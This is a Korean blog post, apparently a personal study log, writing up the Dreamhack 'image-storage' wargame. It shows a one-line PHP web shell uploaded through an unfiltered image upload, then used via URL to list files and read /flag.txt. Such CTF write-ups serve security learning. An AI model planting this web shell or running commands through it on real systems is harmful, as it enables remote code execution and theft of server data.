| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | ||
| 6 | 7 | 8 | 9 | 10 | 11 | 12 |
| 13 | 14 | 15 | 16 | 17 | 18 | 19 |
| 20 | 21 | 22 | 23 | 24 | 25 | 26 |
| 27 | 28 | 29 | 30 |
Tags
- Package
- 수업복습
- SK쉴더스
- echo 명령어
- 성능평가지표
- 클래스
- 예외처리
- 패키지
- OT후기
- gdgm
- 방콕
- Linked List
- 태국
- git push -u
- node.js
- 루키즈33기
- tunder client
- pandas
- 함수
- List
- 생성형AI
- dropna
- 지도학습
- 데이터분포
- 레이블인코딩
- 보안공부
- sqld
- 꽉뚝짝 시장
- 블록(Block)
- 루키즈
Archives
- Today
- Total
개발 블로그
[DreamHeck] image-storage 본문
https://dreamhack.io/wargame/challenges/38
로그인 | Dreamhack
dreamhack.io
이미지 업로드 취약점 문제!
-> 는 보통 웹셸 업로드 문제로 이어지는 경우가 많았음.
그래서 이미지 몇 개 업로드 해보다가, shell.php로 된 웹셸을 업로드함.
보통 더 어려운 문제들은 php 확장자 업로드를 막아두는 식으로 진행이 되는데, 이 문제는 딱히 특별한 확장자를 필터링하는 코드가 없어서 아무 확장자 파일이나 다 업로드가 됨. 그래서 shell.php도 쉽게 업로드 할 수 있었음.
다음은 내가 작성한 shell.php 파일이다.
<?php system($_GET['cmd']); ?>
http://host3.dreamhack.games:14994/uploads/shell.php?cmd=ls

음! 적용이 되는 것을 확인함.
문자 앞단에 플래그는 /flag.txt 에 있다고 했음. 그래서 다음과 같이 url을 넣어서 플래그를 해결함.
http://host3.dreamhack.games:14994/uploads/shell.php?cmd=cat /flag.txt
'Study > Web Hacking' 카테고리의 다른 글
| [DreamHeck] Another Ping (0) | 2026.09.10 |
|---|---|
| [DreamHeck] csrf-1 (0) | 2026.09.09 |
| [DreamHeck] Carve Party (0) | 2026.09.09 |
| [DreamHeck] access-log (0) | 2026.09.09 |
| [DreamHeck] web-ssrf (0) | 2026.09.08 |
